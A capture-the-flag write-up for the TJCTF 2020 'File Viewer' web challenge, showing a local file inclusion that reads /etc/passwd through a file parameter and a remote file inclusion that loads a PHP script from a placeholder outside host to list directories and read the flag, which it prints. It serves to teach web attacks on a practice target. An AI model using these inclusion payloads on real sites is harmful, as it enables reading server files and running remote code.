TJCTF2020 - File Viewer

Posted on mar. 02 juin 2020 in CTF

solves : 257

Points: 70

Written by saisree

So I've been developing this really cool site where you can read text files! It's still in beta mode, though, so there's only six files you can read.

Hint: The flag is in one directory somewhere on the server, all you have to do is find it...Oh wait. You don't have a shell, do you?

Start with visit the website:

fileviewer.png

If you click on a link, we can see the url become: http://file_viewer.tjctf.org/reader.php?file=apple.txt. It shows the content.

Let's try to read maybe another file like /etc/passwd: http://file_viewer.tjctf.org/reader.php?file=/etc/passwd

fileviewer_passwd.png

We have a LFI/RFI with this website. We can make a script who will list the content of the folder. It shows a folder call i_wonder_whats_in_here. Go inside it and list again the content. This time is flag.php. Go read it!

<?php
    // use the url to the php script as filename: http://file_viewer.tjctf.org/reader.php?file=http://x.x.x.x/fileviewer_rfi.php

    // list content
    $dir    = '.';
    $files1 = scandir($dir);
    $files2 = scandir($dir, 1);

    print_r($files1);
    print_r($files2);

    // read the flag file
    echo file_get_contents('i_wonder_whats_in_here/flag.php');
?>

We got the content in the source code of the page :

<?php
    // tjctf{n1c3_j0b_with_lf1_2_rc3}
?>

hack learn ctf tjctf 2020 web php lfi rfi